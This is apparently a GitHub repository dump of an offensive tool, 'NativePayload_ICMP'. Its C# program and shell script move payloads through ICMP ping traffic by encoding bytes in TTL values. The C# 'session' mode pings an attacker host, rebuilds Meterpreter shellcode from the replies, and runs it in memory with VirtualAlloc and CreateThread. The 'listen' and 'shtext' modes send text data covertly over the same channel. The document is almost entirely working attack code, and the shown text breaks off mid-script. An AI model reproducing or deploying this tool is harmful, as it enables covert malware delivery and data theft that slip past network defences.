├── Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL ├── NativePayload_ICMP(WindowsLinux).png ├── NativePayload_ICMP.cs ├── NativePayload_ICMP.png ├── NativePayload_ICMP.sh ├── README.md ├── old_version │ ├── NativePayload_ICMP(old version).sh │ ├── README.md │ ├── finish.png │ ├── step 0.png │ ├── step 1.png │ ├── step 2.png │ └── step 3.png └── script(for test).sh ├── EBOOK ├── NativePayload_ICMP(WindowsLinux).png ├── NativePayload_ICMP.cs ├── NativePayload_ICMP.png ├── NativePayload_ICMP.sh ├── README.md ├── old_version │ ├── NativePayload_ICMP(old version).sh │ ├── README.md │ ├── finish.png │ ├── step 0.png │ ├── step 1.png │ ├── step 2.png │ └── step 3.png └── script(for test).sh ├── NativePayload_ICMP.cs └── README.md /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP(WindowsLinux).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP(WindowsLinux).png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Diagnostics; 6 | using System.Data; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace NativePayload_ICMP 10 | { 11 | class Program 12 | { 13 | static string payload = ""; 14 | public static DataTable Hex_Dec_Table; 15 | static string help = "\n" + "NativePayload_ICMP syntax :" + "\n\n" 16 | + "Syntax 1-1 : NativePayload_ICMP sh \"ffccab1cd01f0400 ....\" Input your meterpreter payload for create sh file" + "\n" 17 | + "Syntax 1-2 : NativePayload_ICMP session \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... Getting Meterpreter Session with Ping via TTL Values" + "\n" 18 | + "Syntax 2-1 : NativePayload_ICMP shtext \"your unicode text....\" Input your DATA/TEXT payload for create sh Script file" + "\n" 19 | + "Syntax 2-2 : NativePayload_ICMP listen \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... Dumping DATA/TEXT payload via TTL Values" + "\n" 20 | + "Syntax 3 : NativePayload_ICMP help" + "\n\n"; 21 | 22 | static void Main(string[] args) 23 | { 24 | try 25 | { 26 | Hex_Dec_Table = new DataTable(); 27 | 28 | Hex_Dec_Table.Columns.Add("Dec", typeof(int)); 29 | Hex_Dec_Table.Columns.Add("Hex", typeof(string)); 30 | 31 | for (int i = 0; i <= 15; i++) 32 | { 33 | if (i <= 9) 34 | { 35 | Hex_Dec_Table.Rows.Add(i, i.ToString()); 36 | } 37 | else if (i >= 10) 38 | { 39 | switch (i) 40 | { 41 | case 10: 42 | { 43 | Hex_Dec_Table.Rows.Add(i, "a"); 44 | } 45 | break; 46 | case 11: 47 | { 48 | Hex_Dec_Table.Rows.Add(i, "b"); 49 | } 50 | break; 51 | case 12: 52 | { 53 | Hex_Dec_Table.Rows.Add(i, "c"); 54 | } 55 | break; 56 | case 13: 57 | { 58 | Hex_Dec_Table.Rows.Add(i, "d"); 59 | } 60 | break; 61 | case 14: 62 | { 63 | Hex_Dec_Table.Rows.Add(i, "e"); 64 | } 65 | break; 66 | case 15: 67 | { 68 | Hex_Dec_Table.Rows.Add(i, "f"); 69 | } 70 | break; 71 | // default: 72 | } 73 | } 74 | } 75 | if (args[0].ToUpper() == "HELP") 76 | { 77 | Console.WriteLine(); 78 | Console.ForegroundColor = ConsoleColor.DarkGray; 79 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 80 | Console.ForegroundColor = ConsoleColor.Gray; 81 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 82 | Console.WriteLine(); 83 | Console.WriteLine(help); 84 | } 85 | else if (args[0].ToUpper() == "SH" || args[0].ToUpper() == "SHTEXT") 86 | { 87 | Console.WriteLine(); 88 | Console.ForegroundColor = ConsoleColor.DarkGray; 89 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 90 | Console.ForegroundColor = ConsoleColor.Gray; 91 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 92 | Console.WriteLine(); 93 | if (args.Length == 2) 94 | { 95 | if (args[0].ToUpper() == "SH") 96 | { 97 | payload = args[1]; 98 | } 99 | if(args[0].ToUpper() == "SHTEXT") 100 | { 101 | try 102 | { 103 | byte[] Xbytes = ASCIIEncoding.ASCII.GetBytes(args[1]); 104 | foreach (var item in Xbytes) 105 | { 106 | payload += item.ToString("x2"); 107 | } 108 | } 109 | catch (Exception e) 110 | { 111 | Console.Write(e.Message); 112 | } 113 | } 114 | } 115 | string ff = ""; 116 | string lastone = ""; 117 | string TempPayload = ""; 118 | for (int i = 0; i < payload.Length;) 119 | { 120 | if (i != payload.Length) 121 | { 122 | ff = payload.Substring(i, 1); 123 | string ss = _HextoDecimal(ff); 124 | // debug only 125 | //Console.WriteLine(ff + " " + ss); 126 | ///Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 1 ;"); 127 | if (lastone != ss) 128 | { 129 | lastone = ss; 130 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 131 | TempPayload += ss.Substring(0, ss.Length - 1); 132 | } 133 | else 134 | { 135 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n"); 136 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 137 | TempPayload += "255" + ss.Substring(0, ss.Length - 1); 138 | } 139 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n"); 140 | //Console.WriteLine(); 141 | i++; 142 | } 143 | } 144 | 145 | StringBuilder Mycode = new StringBuilder(); 146 | Mycode.AppendLine(" #!/bin/sh \n"); 147 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=254;\r"); 148 | Mycode.AppendLine("sleep 5;"); 149 | Mycode.AppendLine("TtlPayload=\"" + TempPayload + "\";"); 150 | Mycode.AppendLine(" for pay in `echo $TtlPayload | xxd -p -c 3`"); 151 | Mycode.AppendLine(" do "); 152 | Mycode.AppendLine(" str=`echo $pay | xxd -r -p`"); 153 | Mycode.AppendLine(" if [ \"$str\" != $'' ];"); 154 | Mycode.AppendLine(" then "); 155 | Mycode.AppendLine(" echo \"sudo sysctl net.ipv4.ip_default_ttl=\"$str \"; sleep 2;\""); 156 | Mycode.AppendLine(" sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2;"); 157 | Mycode.AppendLine(" fi"); 158 | Mycode.AppendLine(" done"); 159 | if (args[0].ToUpper() == "SHTEXT") 160 | { 161 | for (int i = 0; i < 5 - args[1].Length % 5; i++) 162 | { 163 | if (args[1].Length % 5 == 0) break; 164 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 165 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 166 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 167 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 168 | } 169 | 170 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 171 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 172 | } 173 | 174 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255;"); 175 | Mycode.AppendLine("echo \"Done.\";"); 176 | 177 | Console.WriteLine("\n[!] File script.sh Created : \n"); 178 | Console.WriteLine(Mycode.ToString()); 179 | try 180 | { 181 | using (System.IO.FileStream Fs = new System.IO.FileStream("script.sh", System.IO.FileMode.Create, System.IO.FileAccess.Write, System.IO.FileShare.None)) 182 | { 183 | using (System.IO.StreamWriter sw = new System.IO.StreamWriter(Fs)) 184 | { 185 | sw.WriteLine(Mycode.ToString().Replace("\r", string.Empty)); 186 | } 187 | } 188 | } 189 | catch (Exception omg) 190 | { 191 | Console.WriteLine(omg.Message); 192 | } 193 | } 194 | else if (args[0].ToUpper() == "LISTEN") 195 | { 196 | bool flag_end = false; 197 | bool init = false; 198 | int flag_end_count = 0; 199 | int Payload_counter = 0; 200 | string temp = ""; 201 | string start_time, end_time = ""; 202 | start_time = DateTime.Now.ToString(); 203 | string Oonaggi = ""; 204 | Console.WriteLine(); 205 | Console.ForegroundColor = ConsoleColor.DarkGray; 206 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 207 | Console.ForegroundColor = ConsoleColor.Gray; 208 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 209 | Console.WriteLine(); 210 | Console.ForegroundColor = ConsoleColor.Yellow; 211 | Console.WriteLine("[!] Listening Mode"); 212 | Console.ForegroundColor = ConsoleColor.Gray; 213 | Console.WriteLine(); 214 | bool isDublicate = false; 215 | string Last_ttl_str = ""; 216 | string TestStr = ""; 217 | int Timer_Time_Show_Bytes = 0; 218 | int two = 0; 219 | string String_two_Bytes = ""; 220 | byte[] String_from_Bytes = new byte[5]; 221 | Console.WriteLine("{0} Dumping These Bytes: ", DateTime.Now.ToString()); 222 | String_two_Bytes = ""; 223 | while (true) 224 | { 225 | if (flag_end) break; 226 | //// ping and send ICMP Traffic to attacker linux system to Dump payloads via TTL response ;) 227 | string getcode = _Ping(args[1], 1); 228 | try 229 | { 230 | getcode = getcode.Remove(getcode.Length - 1, 1); 231 | } 232 | catch (Exception e1) 233 | { 234 | Console.ForegroundColor = ConsoleColor.Red; 235 | Console.WriteLine("e1 : " + e1.Message); 236 | Console.WriteLine(); 237 | Console.WriteLine("Error : it is not good ;( "); 238 | Console.WriteLine("Please run this tool again"); 239 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 240 | Console.ForegroundColor = ConsoleColor.Gray; 241 | break; 242 | } 243 | 244 | if (getcode == "254") { init = true; } 245 | if (getcode == "255") 246 | { 247 | isDublicate = true; 248 | Last_ttl_str = getcode; 249 | } 250 | if (getcode != "255") 251 | { 252 | Last_ttl_str = getcode; 253 | flag_end_count = 0; 254 | 255 | if (getcode != temp && getcode != "255" && getcode != "253") 256 | { 257 | if (init && getcode != "254") 258 | { 259 | if (Timer_Time_Show_Bytes == 10) 260 | { 261 | Console.ForegroundColor = ConsoleColor.DarkCyan; 262 | int kk = 0; 263 | for (int i = 0; i < 5;) 264 | { 265 | String_from_Bytes[i] = byte.Parse(String_two_Bytes.Substring(kk, 2), System.Globalization.NumberStyles.HexNumber); 266 | kk++; 267 | kk++; 268 | i++; 269 | } 270 | 271 | Console.Write(" ==> " + ASCIIEncoding.ASCII.GetString(String_from_Bytes)); 272 | Timer_Time_Show_Bytes = 0; 273 | String_two_Bytes = ""; 274 | Console.WriteLine(); 275 | } 276 | 277 | Console.ForegroundColor = ConsoleColor.Cyan; 278 | TestStr = getcode.Substring(getcode.Length - 2, 2); 279 | string Text = ""; 280 | for (int j = 0; j <= 15; j++) 281 | { 282 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(TestStr)) 283 | { 284 | 285 | Text = (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 286 | break; 287 | } 288 | } 289 | 290 | Console.Write("{0}", Text); 291 | String_two_Bytes += Text; 292 | 293 | Payload_counter++; 294 | Timer_Time_Show_Bytes++; 295 | two++; 296 | } 297 | else if (init == false) 298 | { 299 | // Console.ForegroundColor = ConsoleColor.DarkGreen; 300 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 301 | } 302 | } 303 | else if (getcode == temp && getcode != "255") 304 | { 305 | // Console.ForegroundColor = ConsoleColor.DarkGreen; 306 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 307 | } 308 | 309 | System.Threading.Thread.Sleep(1000); 310 | temp = getcode; 311 | } 312 | else if (getcode == "255") 313 | { 314 | flag_end_count++; 315 | Console.ForegroundColor = ConsoleColor.Gray; 316 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 317 | 318 | System.Threading.Thread.Sleep(500); 319 | temp = getcode; 320 | if (flag_end_count >= 10) 321 | { 322 | flag_end = true; 323 | Console.ForegroundColor = ConsoleColor.Gray; 324 | Console.WriteLine(); 325 | Console.WriteLine("{0} Dumping Payloads Done.",DateTime.Now.ToString()); 326 | } 327 | } 328 | } 329 | } 330 | else if (args[0].ToUpper() == "SESSION") 331 | { 332 | bool flag_end = false; 333 | bool init = false; 334 | int flag_end_count = 0; 335 | int Payload_counter = 0; 336 | string temp = ""; 337 | string start_time, end_time = ""; 338 | start_time = DateTime.Now.ToString(); 339 | string Oonaggi = ""; 340 | Console.WriteLine(); 341 | Console.ForegroundColor = ConsoleColor.DarkGray; 342 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 343 | Console.ForegroundColor = ConsoleColor.Gray; 344 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 345 | Console.WriteLine(); 346 | Console.ForegroundColor = ConsoleColor.Yellow; 347 | Console.WriteLine("[!] Meterpreter Session Mode"); 348 | Console.ForegroundColor = ConsoleColor.Gray; 349 | Console.WriteLine(); 350 | bool isDublicate = false; 351 | string Last_ttl_str = ""; 352 | while (true) 353 | { 354 | if (flag_end) break; 355 | //// ping and sending ICMP Traffic to attacker linux system to Dump payloads by TTL response ;) 356 | string getcode = _Ping(args[1], 1); 357 | try 358 | { 359 | getcode = getcode.Remove(getcode.Length - 1, 1); 360 | } 361 | catch (Exception e1) 362 | { 363 | Console.ForegroundColor = ConsoleColor.Red; 364 | Console.WriteLine("e1 : " + e1.Message); 365 | Console.WriteLine(); 366 | Console.WriteLine("Error : it is not good ;( "); 367 | Console.WriteLine("Please run this tool again"); 368 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 369 | Console.ForegroundColor = ConsoleColor.Gray; 370 | break; 371 | } 372 | 373 | if (getcode == "254") { init = true; } 374 | if (getcode == "255") 375 | { 376 | isDublicate = true; 377 | Last_ttl_str = getcode; 378 | } 379 | if (getcode != "255") 380 | { 381 | Last_ttl_str = getcode; 382 | flag_end_count = 0; 383 | if (getcode != temp && getcode != "255" && getcode != "253") 384 | { 385 | if (init && getcode != "254") 386 | { 387 | Console.ForegroundColor = ConsoleColor.Green; 388 | Console.Write("{0} , Dump:{1},", DateTime.Now.ToString(), Payload_counter.ToString()); 389 | Console.ForegroundColor = ConsoleColor.Cyan; 390 | //string dd = _HextoDecimal(getcode.Substring(1, 2)); 391 | Console.Write(" DATA[{0}] ", getcode.Substring(getcode.Length - 2, 2)); 392 | Oonaggi += getcode.Substring(getcode.Length - 2, 2); 393 | Console.ForegroundColor = ConsoleColor.Green; 394 | Console.WriteLine("from {0} final: {1}", args[1], getcode); 395 | Payload_counter++; 396 | } 397 | else if (init == false) 398 | { 399 | Console.ForegroundColor = ConsoleColor.DarkGreen; 400 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 401 | } 402 | } 403 | else if (getcode == temp && getcode != "255") 404 | { 405 | Console.ForegroundColor = ConsoleColor.DarkGreen; 406 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 407 | } 408 | 409 | System.Threading.Thread.Sleep(1000); 410 | temp = getcode; 411 | } 412 | else if (getcode == "255") 413 | { 414 | flag_end_count++; 415 | Console.ForegroundColor = ConsoleColor.DarkGreen; 416 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 417 | 418 | System.Threading.Thread.Sleep(500); 419 | temp = getcode; 420 | if (flag_end_count >= 10) { flag_end = true; } 421 | } 422 | } 423 | 424 | end_time = DateTime.Now.ToString(); 425 | 426 | Console.WriteLine(end_time + " , Done "); 427 | 428 | byte[] __Bytes = new byte[Oonaggi.Length / 4]; 429 | int payload_dec_count = Oonaggi.Length / 4; 430 | int tmp_counter = 0; 431 | string current = null; 432 | int _0_to_2_ = 0; 433 | for (int d = 0; d < payload_dec_count;) 434 | { 435 | string tmp1_current = (Oonaggi.Substring(tmp_counter, 2)); 436 | 437 | for (int j = 0; j <= 15; j++) 438 | { 439 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(tmp1_current)) 440 | { 441 | _0_to_2_++; 442 | 443 | current += (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 444 | 445 | if (_0_to_2_ == 2) 446 | { 447 | Console.Write(current + " "); 448 | __Bytes[d] = Convert.ToByte(current, 16); 449 | _0_to_2_ = 0; 450 | d++; 451 | current = null; 452 | } 453 | } 454 | } 455 | 456 | tmp_counter++; 457 | tmp_counter++; 458 | 459 | } 460 | Console.WriteLine(); 461 | Console.ForegroundColor = ConsoleColor.Gray; 462 | Console.WriteLine("Bingo Meterpreter session by ICMPv4 traffic ;)"); 463 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 464 | Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length); 465 | IntPtr hThread = IntPtr.Zero; 466 | UInt32 threadId = 0; 467 | IntPtr pinfo = IntPtr.Zero; 468 | 469 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 470 | WaitForSingleObject(hThread, 0xFFFFFFFF); 471 | 472 | } 473 | } 474 | catch (Exception _main) 475 | { 476 | Console.WriteLine("Main Error: {0}", _main.Message); 477 | Console.WriteLine("Main Error: Please use help , NativePayload_ICMP help", _main.Message); 478 | } 479 | } 480 | 481 | 482 | static Dictionary HexDic = new Dictionary 483 | { 484 | //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208} 485 | //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215} 486 | 487 | {'0',100},{'1',101},{'2',102},{'3',103},{'4',104},{'5',105},{'6',106},{'7',107},{'8',108} 488 | ,{'9',109},{'a',110},{'b',111},{'c',112},{'d',113},{'e',114},{'f',115} 489 | }; 490 | 491 | static string _HextoDecimal(string hexstring) 492 | { 493 | 494 | string result = ""; 495 | hexstring = hexstring.ToLower(); 496 | for (int i = 0; i < hexstring.Length; i++) 497 | { 498 | char Oonagii = hexstring[hexstring.Length - 1 - i]; 499 | result += (HexDic[Oonagii] * (int)Math.Pow(16, i)).ToString() + " "; 500 | } 501 | return result; 502 | } 503 | 504 | 505 | static string _Ping(string IPAddress_DNSName, int counter) 506 | { 507 | string Final_Dec = ""; 508 | 509 | try 510 | { 511 | 512 | if (counter != 1) { counter = 1; } 513 | 514 | /// Make ICMPv4 traffic for getting Meterpreter Payloads by Ping 515 | ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("ping.exe", IPAddress_DNSName + " -n " + counter.ToString()); 516 | ns_Prcs_info.RedirectStandardInput = true; 517 | ns_Prcs_info.RedirectStandardOutput = true; 518 | ns_Prcs_info.UseShellExecute = false; 519 | 520 | 521 | Process myPing = new Process(); 522 | myPing.StartInfo = ns_Prcs_info; 523 | myPing.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 524 | myPing.Start(); 525 | 526 | //string result_Line0 = ""; 527 | string Pingoutput = myPing.StandardOutput.ReadToEnd(); 528 | string[] All_lines = Pingoutput.Split('\t', '\n'); 529 | 530 | //int PayloadLines_current_id = 0; 531 | foreach (var item in All_lines) 532 | { 533 | if (item.StartsWith("Reply ")) 534 | { 535 | Final_Dec = item.Substring(item.Length - 4); 536 | } 537 | // debug 538 | // Console.WriteLine(item + "\n"+ s); 539 | } 540 | 541 | } 542 | catch (Exception e) 543 | { 544 | 545 | Console.WriteLine(e.Message); 546 | } 547 | return Final_Dec; 548 | } 549 | 550 | public static UInt32 MEM_COMMIT = 0x1000; 551 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 552 | 553 | [DllImport("kernel32")] 554 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 555 | [DllImport("kernel32")] 556 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 557 | [DllImport("kernel32")] 558 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 559 | } 560 | } 561 | -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/NativePayload_ICMP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | payload=""; 3 | PingRequest=0; 4 | c=1; 5 | temp=""; 6 | tput setaf 7; 7 | echo 8 | echo "NativePayload_ICMP.sh Download Payload by ICMPv4 Traffic via 'TTL' "; 9 | echo "NativePayload_ICMP v1.0 , Published by Damon Mohammadbagher 2017-2018 "; 10 | tput setaf 9; 11 | if [ "$1" == $'help' ] ; 12 | then 13 | echo 14 | echo "step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext \"your text or string\""; 15 | echo "step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen \"w.x.y.z\""; 16 | echo "Note: in step1 you should use Client-side system w.x.y.z IPv4Address"; 17 | echo 18 | fi 19 | 20 | if [ "$1" == $'shtext' ] ; 21 | then 22 | #textpayload=`echo $2$'\157' | xxd -p` 23 | textpayload=`echo -n $2 | od -A n -t x1` 24 | ttlpayload=""; 25 | mytemp=""; 26 | echo 27 | echo "[!] your payload Text:" $2; 28 | echo "[!] your payload bytes:" $textpayload; 29 | for pay in `echo $textpayload | xxd -c 1` 30 | do 31 | case $pay in 32 | 0) 33 | if [ "$mytemp" != $'0' ] ; 34 | then 35 | ttlpayload+="100" 36 | fi 37 | ;; 38 | 1) 39 | if [ "$mytemp" != $'1' ] ; 40 | then 41 | ttlpayload+="101" 42 | fi 43 | ;; 44 | 2) 45 | if [ "$mytemp" != $'2' ] ; 46 | then 47 | ttlpayload+="102" 48 | fi 49 | ;; 50 | 3) 51 | if [ "$mytemp" != $'3' ] ; 52 | then 53 | ttlpayload+="103" 54 | fi 55 | ;; 56 | 4) 57 | if [ "$mytemp" != $'4' ] ; 58 | then 59 | ttlpayload+="104" 60 | fi 61 | ;; 62 | 5) 63 | if [ "$mytemp" != $'5' ] ; 64 | then 65 | ttlpayload+="105" 66 | fi 67 | ;; 68 | 6) 69 | if [ "$mytemp" != $'6' ] ; 70 | then 71 | ttlpayload+="106" 72 | fi 73 | ;; 74 | 7) 75 | if [ "$mytemp" != $'7' ] ; 76 | then 77 | ttlpayload+="107" 78 | fi 79 | ;; 80 | 8) 81 | if [ "$mytemp" != $'8' ] ; 82 | then 83 | ttlpayload+="108" 84 | fi 85 | ;; 86 | 9) 87 | if [ "$mytemp" != $'9' ] ; 88 | then 89 | ttlpayload+="109" 90 | fi 91 | ;; 92 | a) 93 | if [ "$mytemp" != $'a' ] ; 94 | then 95 | ttlpayload+="110" 96 | fi 97 | ;; 98 | b) 99 | if [ "$mytemp" != $'b' ] ; 100 | then 101 | ttlpayload+="111" 102 | fi 103 | ;; 104 | c) 105 | if [ "$mytemp" != $'c' ] ; 106 | then 107 | ttlpayload+="112" 108 | fi 109 | ;; 110 | d) 111 | if [ "$mytemp" != $'d' ] ; 112 | then 113 | ttlpayload+="113" 114 | fi 115 | ;; 116 | e) 117 | if [ "$mytemp" != $'e' ] ; 118 | then 119 | ttlpayload+="114" 120 | fi 121 | ;; 122 | f) 123 | if [ "$mytemp" != $'f' ] ; 124 | then 125 | ttlpayload+="115" 126 | fi 127 | ;; 128 | esac 129 | mytemp=$pay; 130 | done 131 | #echo $ttlpayload; 132 | mytemp2=""; 133 | Finalttlpayload=""; 134 | for pay2 in `echo $ttlpayload | xxd -g 0 -c 3 | awk {'print $3'}` 135 | do 136 | if [ "$mytemp2" == "$pay2" ] 137 | then 138 | Finalttlpayload+="253""$pay2"; 139 | fi 140 | if [ "$mytemp2" != "$pay2" ] 141 | then 142 | Finalttlpayload+=$pay2; 143 | fi 144 | mytemp2=$pay2 145 | done 146 | echo 147 | 148 | #echo "your TTL payload:" $Finalttlpayload 149 | 150 | # Finalttlpayload=`echo "${Finalttlpayload::-6}"`; 151 | mylength=`echo ${#Finalttlpayload}` 152 | div=3; 153 | length=$((mylength / div)); 154 | 155 | echo "[!] your TTL payload:" $Finalttlpayload; 156 | tput setaf 3; 157 | echo "[!] at least you need ("$length") Times to change TTL value"; 158 | echo "[!] at least you need ("$length "* 2) Ping Request/Response"; 159 | tput setaf 9; 160 | echo "[>] Start Flag , change TTL value to '254' with sleep 5)"; 161 | sudo sysctl net.ipv4.ip_default_ttl=254; sleep 5; 162 | echo "[>] Running sysctl command for change TTL values (Default sleep is 2)"; 163 | echo 164 | 165 | for TTLs in `echo $Finalttlpayload | xxd -p -c 3` 166 | do 167 | string=`echo $TTLs | xxd -r -p` 168 | if [ "$string" != $'' ] && [ "$string" != $'.' ]; 169 | then 170 | echo "sudo sysctl net.ipv4.ip_default_ttl="$string "; sleep 2"; 171 | sudo sysctl net.ipv4.ip_default_ttl=$string; sleep 2; 172 | fi 173 | done 174 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2; 175 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 2; 176 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2; 177 | fi 178 | if [ "$1" == $'listen' ] ; 179 | then 180 | while (true) 181 | do 182 | Time=`date '+%d/%m/%Y %H:%M:%S'` 183 | ((PingRequest++)); 184 | 185 | string=`ping $2 -c 1 | grep -e ttl= | awk {'print $6'}` 186 | echo 187 | string=`echo $string | cut -d'=' -f2` 188 | 189 | case $string in 190 | 100) 191 | tput setaf 2; 192 | echo "[$Time]" "Dumped Byte via TTL : 0" 193 | if (( $temp != 100 )) ; 194 | then 195 | payload+="0" 196 | fi 197 | ;; 198 | 101) 199 | tput setaf 2; 200 | echo "[$Time]" "Dumped Byte via TTL : 1" 201 | if (( $temp != 101 )) ; 202 | then 203 | payload+="1" 204 | fi 205 | ;; 206 | 102) 207 | tput setaf 2; 208 | echo "[$Time]" "Dumped Byte via TTL : 2" 209 | if (( $temp != 102 )) ; 210 | then 211 | payload+="2" 212 | fi 213 | ;; 214 | 103) 215 | tput setaf 2; 216 | echo "[$Time]" "Dumped Byte via TTL : 3" 217 | if (( $temp != 103 )) ; 218 | then 219 | payload+="3" 220 | fi 221 | ;; 222 | 104) 223 | tput setaf 2; 224 | echo "[$Time]" "Dumped Byte via TTL : 4" 225 | if (( $temp != 104 )) ; 226 | then 227 | payload+="4" 228 | fi 229 | ;; 230 | 105) 231 | tput setaf 2; 232 | echo "[$Time]" "Dumped Byte via TTL : 5" 233 | if (( $temp != 105 )) ; 234 | then 235 | payload+="5" 236 | fi 237 | ;; 238 | 106) 239 | tput setaf 2; 240 | echo "[$Time]" "Dumped Byte via TTL : 6" 241 | if (( $temp != 106 )) ; 242 | then 243 | payload+="6" 244 | fi 245 | ;; 246 | 107) 247 | tput setaf 2; 248 | echo "[$Time]" "Dumped Byte via TTL : 7" 249 | if (( $temp != 107 )) ; 250 | then 251 | payload+="7" 252 | fi 253 | ;; 254 | 108) 255 | tput setaf 2; 256 | echo "[$Time]" "Dumped Byte via TTL : 8" 257 | if (( $temp != 108 )) ; 258 | then 259 | payload+="8" 260 | fi 261 | ;; 262 | 109) 263 | tput setaf 2; 264 | echo "[$Time]" "Dumped Byte via TTL : 9" 265 | if (( $temp != 109 )) ; 266 | then 267 | payload+="9" 268 | fi 269 | ;; 270 | 110) 271 | tput setaf 2; 272 | echo "[$Time]" "Dumped Byte via TTL : a" 273 | if (( $temp != 110 )) ; 274 | then 275 | payload+="a" 276 | fi 277 | ;; 278 | 111) 279 | tput setaf 2; 280 | echo "[$Time]" "Dumped Byte via TTL : b" 281 | if (( $temp != 111 )) ; 282 | then 283 | payload+="b" 284 | fi 285 | ;; 286 | 112) 287 | tput setaf 2; 288 | echo "[$Time]" "Dumped Byte via TTL : c" 289 | if (( $temp != 112 )) ; 290 | then 291 | payload+="c" 292 | fi 293 | ;; 294 | 113) 295 | tput setaf 2; 296 | echo "[$Time]" "Dumped Byte via TTL : d" 297 | if (( $temp != 113 )) ; 298 | then 299 | payload+="d" 300 | fi 301 | ;; 302 | 114) 303 | tput setaf 2; 304 | echo "[$Time]" "Dumped Byte via TTL : e" 305 | if (( $temp != 114 )) ; 306 | then 307 | 